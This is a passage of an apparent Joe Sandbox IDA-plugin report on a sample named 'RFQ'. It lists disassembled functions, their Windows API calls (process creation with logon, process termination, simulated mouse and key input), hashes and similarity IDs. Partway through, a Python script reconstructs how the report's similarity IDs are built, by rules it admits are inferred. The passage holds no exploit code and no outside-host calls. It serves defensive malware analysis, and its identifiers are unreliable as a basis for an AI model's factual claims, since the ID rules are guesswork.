                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00789BE2
                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00789C44
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4137160315-0
                                                                                                                                                    • Opcode ID: d37dc9cc2b5c6ffad297d3bbb0600976ccd5cef874f52c1353fd72abb7a3dfad
                                                                                                                                                    • Instruction ID: 8c076321d2c218a7814f9f588868ca214a389e27731054a8e0c651946ef8f3e6
                                                                                                                                                    • Opcode Fuzzy Hash: d37dc9cc2b5c6ffad297d3bbb0600976ccd5cef874f52c1353fd72abb7a3dfad
                                                                                                                                                    • Instruction Fuzzy Hash: 9231C372144305ABD720DF14D849F9ABBE9FF84314F044A29F589D7181E635E914CB92
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0076AFAE
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0076AFB5
                                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0076AFC4
                                                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 0076AFCF
                                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0076AFFE
                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 0076B012
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                                    • Opcode ID: 0f5b26b238901562c019aa2f42813b5ed9a71645da2f6f4144f91644942e36a1
                                                                                                                                                    • Instruction ID: 6fd6c0834a93b78f2977dba969da6a7baa391695982e2af476c0618d8991e276
                                                                                                                                                    • Opcode Fuzzy Hash: 0f5b26b238901562c019aa2f42813b5ed9a71645da2f6f4144f91644942e36a1
                                                                                                                                                    • Instruction Fuzzy Hash: 9B214C72100209BBDB129F94ED09FEE7BA9AB45304F048125FE02A2161D37ADD61EF62
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0074AFE3
                                                                                                                                                      • Part of subcall function 0074AF83: SelectObject.GDI32(?,00000000), ref: 0074AFF2
                                                                                                                                                      • Part of subcall function 0074AF83: BeginPath.GDI32(?), ref: 0074B009
                                                                                                                                                      • Part of subcall function 0074AF83: SelectObject.GDI32(?,00000000), ref: 0074B033
                                                                                                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0079EC20
                                                                                                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0079EC34
                                                                                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0079EC42
                                                                                                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0079EC52
                                                                                                                                                    • EndPath.GDI32(00000000), ref: 0079EC62
                                                                                                                                                    • StrokePath.GDI32(00000000), ref: 0079EC72
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                    • Opcode ID: e1dd75baaf408eb046cb44641d0155b0e25d861908687bc1ea0a1e28edc103fa
                                                                                                                                                    • Instruction ID: 5c8d18cea9d4717b4df4665af61bf1e6b188a4ca17b15f3dfe56858471077cfc
                                                                                                                                                    • Opcode Fuzzy Hash: e1dd75baaf408eb046cb44641d0155b0e25d861908687bc1ea0a1e28edc103fa
                                                                                                                                                    • Instruction Fuzzy Hash: 5111057200014EBFEF129F94DC88FEA7F6DEB08350F048122BE089A160E7769D55DBA4
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 0076E1C0
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0076E1D1
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0076E1D8
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0076E1E0
                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0076E1F7
                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0076E209
                                                                                                                                                      • Part of subcall function 00769AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00769A05,00000000,00000000,?,00769DDB), ref: 0076A53A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 603618608-0
                                                                                                                                                    • Opcode ID: 1bc81f9587121d57b75e13e6107f064fca4668f13907c9b5af27f9706409a235
                                                                                                                                                    • Instruction ID: 36fb3802815a7301901f127a4a6df7741c39912e17bc11403d701cb4fbd65667
                                                                                                                                                    • Opcode Fuzzy Hash: 1bc81f9587121d57b75e13e6107f064fca4668f13907c9b5af27f9706409a235
                                                                                                                                                    • Instruction Fuzzy Hash: 2C0184B9A00218BFEB109BA58C45F5EBFB8EB48351F008166EE05A7290E6749C00CFA0
                                                                                                                                                    APIs
                                                                                                                                                    • __init_pointers.LIBCMT ref: 00757B47
                                                                                                                                                      • Part of subcall function 0075123A: __initp_misc_winsig.LIBCMT ref: 0075125E
                                                                                                                                                      • Part of subcall function 0075123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00757F51
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00757F65
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00757F78
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00757F8B
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00757F9E
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00757FB1
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00757FC4
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00757FD7
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00757FEA
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00757FFD
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00758010
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00758023
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00758036
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00758049
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0075805C
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0075806F
                                                                                                                                                    • __mtinitlocks.LIBCMT ref: 00757B4C
                                                                                                                                                      • Part of subcall function 00757E23: InitializeCriticalSectionAndSpinCount.KERNEL32(007EAC68,00000FA0,?,?,00757B51,00755E77,007E6C70,00000014), ref: 00757E41
                                                                                                                                                    • __mtterm.LIBCMT ref: 00757B55
                                                                                                                                                      • Part of subcall function 00757BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00757B5A,00755E77,007E6C70,00000014), ref: 00757D3F
                                                                                                                                                      • Part of subcall function 00757BBD: _free.LIBCMT ref: 00757D46
                                                                                                                                                      • Part of subcall function 00757BBD: DeleteCriticalSection.KERNEL32(007EAC68,?,?,00757B5A,00755E77,007E6C70,00000014), ref: 00757D68
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 00757B7A
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00757BA3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2942034483-0
                                                                                                                                                    • Opcode ID: 3b238d95861e2a901d0c1ad7d06599e0ece7a0652b3dae5354e2cacfa746cf7c
                                                                                                                                                    • Instruction ID: 8bfc9e9f8b7fe2b146bf495c78e7e492b01056980b9f8934518c2d17cc74da6a
                                                                                                                                                    • Opcode Fuzzy Hash: 3b238d95861e2a901d0c1ad7d06599e0ece7a0652b3dae5354e2cacfa746cf7c
                                                                                                                                                    • Instruction Fuzzy Hash: 84F06DB210D3629AE62D76387C0BACA27849B01733B214699FC64D90D2FFAD9C49C169
                                                                                                                                                    APIs
                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0073281D
                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00732825
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00732830
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0073283B
                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00732843
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0073284B
                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 170b1d4a26eea7f633e4a33df523c8df16c188c4f28dbf4b1360d854613dc93d
• Instruction ID: e3f1efe5aee0e6d0b0cef4585638b4e014b6c69d390c46125140883a11c7a929
• Opcode Fuzzy Hash: 170b1d4a26eea7f633e4a33df523c8df16c188c4f28dbf4b1360d854613dc93d
• Instruction Fuzzy Hash: 40016CB0901B5A7DE3008F6A8C85B52FFA8FF15354F00411B915C47941C7F5A864CBE5
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 1423608774-0
• Opcode ID: 715631795b5699907a66776d58f34baa808546de0105d28c314d936501a2439f
• Instruction ID: 3f97ddeaaa68c4f5abfef0ae21c0ac768572b04383374ce8ec8cf51b82d1e406
• Opcode Fuzzy Hash: 715631795b5699907a66776d58f34baa808546de0105d28c314d936501a2439f
• Instruction Fuzzy Hash: A8018136103212EBDB295B64EC49EEB7769FF88741B05C629F607921A0EB7C9C00DB54
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00777C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00777C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 00777C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00777C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00777C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00777C4C
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: cf64c08e1d881dd0319e0008eef1e18abd5f4735c7068fae7a1e4b58e6578fd2
• Instruction ID: fec74bc8ef308afd25acadab6ae8af2f6edd3c406f5569f8ef93cdd6e2dd4fb2
• Opcode Fuzzy Hash: cf64c08e1d881dd0319e0008eef1e18abd5f4735c7068fae7a1e4b58e6578fd2
• Instruction Fuzzy Hash: 12F06772201158BBE6351B529C0EFEF3BBCEBCAB55F004218FA01A1051E7A81E41C6B9
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00779A33
• EnterCriticalSection.KERNEL32(?,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 00779A44
• TerminateThread.KERNEL32(?,000001F6,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 00779A51
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 00779A5E
  • Part of subcall function 007793D1: CloseHandle.KERNEL32(?,?,00779A6B,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 007793DB
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00779A71
• LeaveCriticalSection.KERNEL32(?,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 00779A78
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 4bcd038647e54980b719751ca04e2df4c2d074eccb047b5183fee574a66938fb
• Instruction ID: cee2b7ac90b58c9d00023f76b1d31d56e8b12879d008dda024c9da563f6109d2
• Opcode Fuzzy Hash: 4bcd038647e54980b719751ca04e2df4c2d074eccb047b5183fee574a66938fb
• Instruction Fuzzy Hash: 47F08236142211EBD7251BA4EC8DFEB7779FF84301B158625F603911A0EB7D9C11DB54
APIs
  • Part of subcall function 0074F4EA: std::exception::exception.LIBCMT ref: 0074F51E
  • Part of subcall function 0074F4EA: __CxxThrowException@8.LIBCMT ref: 0074F533
• __swprintf.LIBCMT ref: 00731EA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00731D49
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Exception@8Throw__swprintfstd::exception::exception
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 2125237772-557222456
• Opcode ID: 21f059907600aff688c40392ce7bbb9ad1ee94c651d714fbdbf66b67df61c306
• Instruction ID: 4e14fa38cedf91518dfe6728b2a3e1859eb592957af32f7dcd230123c1b61d27
• Opcode Fuzzy Hash: 21f059907600aff688c40392ce7bbb9ad1ee94c651d714fbdbf66b67df61c306
• Instruction Fuzzy Hash: C3919E71508241EFE725EF24C899C6EB7A4FF85700F504A2DF885972A2DB39ED05CB92
APIs
• VariantInit.OLEAUT32(?), ref: 0078B006
• CharUpperBuffW.USER32(?,?), ref: 0078B115
• VariantClear.OLEAUT32(?), ref: 0078B298
  • Part of subcall function 00779DC5: VariantInit.OLEAUT32(00000000), ref: 00779E05
  • Part of subcall function 00779DC5: VariantCopy.OLEAUT32(?,?), ref: 00779E0E
  • Part of subcall function 00779DC5: VariantClear.OLEAUT32(?), ref: 00779E1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
• Opcode ID: b4da49a554818b0a342cdd99cd82857a12ed2caa4901743e5b8ab83cfebd1f72
• Instruction ID: 4293d251b4f73448b3e69c786e1b46e8cd6c5f15dea62ad6b654958a69b68ef0
• Opcode Fuzzy Hash: b4da49a554818b0a342cdd99cd82857a12ed2caa4901743e5b8ab83cfebd1f72
• Instruction Fuzzy Hash: 99916A70648301DFCB10EF24C48995ABBE4BF89704F04896DF89A9B362DB39ED45CB52
APIs
  • Part of subcall function 0074C6F4: _wcscpy.LIBCMT ref: 0074C717
• _memset.LIBCMT ref: 00775438
• GetMenuItemInfoW.USER32(?), ref: 00775467
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00775513
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0077553D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
• Opcode ID: 45906f3e3111605ddacc70dfc9d577858bc705d0b93b5eff1f149d16b3c4cb7f
• Instruction ID: caa9b3ab00a2ca68014d54baa26011382a6517eeb412b810223c33af7a08a5e9
• Opcode Fuzzy Hash: 45906f3e3111605ddacc70dfc9d577858bc705d0b93b5eff1f149d16b3c4cb7f
• Instruction Fuzzy Hash: 515132712047019BDB14DB28C844ABBB7EAAF853A4F14862DF89DC31E1DBECCC548B52
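The Similarity fields in the function records above (API ID, String ID) are the keys Joe Sandbox uses to match a function against other reports, but the page only shows the APIs listed for each function and the resulting ID, not the rule that maps one to the other. The following is an added example, not Joe Sandbox code: a Python reconstruction inferred from the five records above whose APIs block and API ID are both visible (the PostMessageW/TerminateProcess function, the InterlockedExchange/TerminateThread function, the __swprintf function, the VariantInit/CharUpperBuffW function and the GetMenuItemInfoW function). It assumes that API names are split at capital letters, that C-runtime and C++ names (leading underscore followed by a lowercase letter, or containing "::") stay whole, that tokens of three characters or fewer (Get, Set, For, Id, W, Cxx in the listings above) are dropped, that the remaining tokens are grouped by how often they occur, sorted bytewise inside a group and the groups joined from most to least frequent with "$", that "Part of subcall function" calls count like direct calls, and that strings are joined with "$" in listing order. Those rules are assumptions that happen to reproduce every ID visible on this page; the numeric "API String ID" hash is not derivable from the page and is not attempted. The sample inputs are the page's own listing lines, embedded as constructed text.

```python
import re
from collections import Counter

# Constructed input: the "APIs" lines of the PostMessageW/TerminateProcess
# function, copied as they appear in the listing above (bullets and refs kept).
WINKILL_LINES = """\
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00777C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00777C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 00777C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00777C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00777C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00777C4C
"""

# Constructed input: the __swprintf function, which has inlined subcalls,
# C++ and C-runtime names and a Strings section (raw string: backslashes kept).
SWPRINTF_LINES = r"""
APIs
  • Part of subcall function 0074F4EA: std::exception::exception.LIBCMT ref: 0074F51E
  • Part of subcall function 0074F4EA: __CxxThrowException@8.LIBCMT ref: 0074F533
• __swprintf.LIBCMT ref: 00731EA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00731D49
"""

# One API line: optional "Part of subcall function XXXX: " prefix, then NAME.MODULE.
API_LINE = re.compile(
    r"^(?:Part of subcall function [0-9A-F]+: )?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_:@]*)\.(?P<module>[A-Z0-9]+)\b"
)
# One string line: the string text followed by ", xrefs: <hex>".
STRING_LINE = re.compile(r"^(?P<text>.*), xrefs: [0-9A-F]+$")

# Assumption (inferred): names starting "_" + lowercase, or containing "::",
# are not split; all other names are split at capital letters.
WHOLE_NAME = re.compile(r"^_*[a-z]|::")
CAMEL = re.compile(r"[A-Z][a-z0-9@]*")
MIN_TOKEN = 4  # assumption (inferred): Get, Set, For, Id, W, Cxx are dropped


def parse_listing(text):
    """Return (api_names, strings) from one function's APIs/Strings listing."""
    apis, strings = [], []
    section = "APIs"
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            section = line
            continue
        if line.startswith("•"):
            line = line[1:].strip()
        m = (API_LINE if section == "APIs" else STRING_LINE).match(line)
        if m:
            (apis if section == "APIs" else strings).append(m.group(1))
    return apis, strings


def tokens(name):
    """Split one API name into the tokens that contribute to the API ID."""
    if WHOLE_NAME.search(name):
        return [name]
    return [t for t in CAMEL.findall(name) if len(t) >= MIN_TOKEN]


def api_id(api_names):
    """Group tokens by frequency; most frequent group first, '$' between groups."""
    counts = Counter(t for n in api_names for t in tokens(n))
    groups = {}
    for tok, c in counts.items():
        groups.setdefault(c, []).append(tok)
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))


def string_id(strings):
    return "$".join(strings)


def similarity_ids(text):
    apis, strings = parse_listing(text)
    return api_id(apis), string_id(strings)


if __name__ == "__main__":
    for label, text in (("WinKill-like", WINKILL_LINES), ("__swprintf", SWPRINTF_LINES)):
        aid, sid = similarity_ids(text)
        print(f"{label}: API ID={aid!r}  String ID={sid!r}")
```

Run against the two embedded listings, this yields the API IDs and String IDs shown in the corresponding Similarity blocks above; fed the APIs of the other three records it yields their API IDs as well, which is what makes the inferred rules usable for matching functions from your own disassembly against a report like this one. Where a report shows an ID that the rules do not reproduce, treat the rules, not the report, as wrong.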
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0077027B
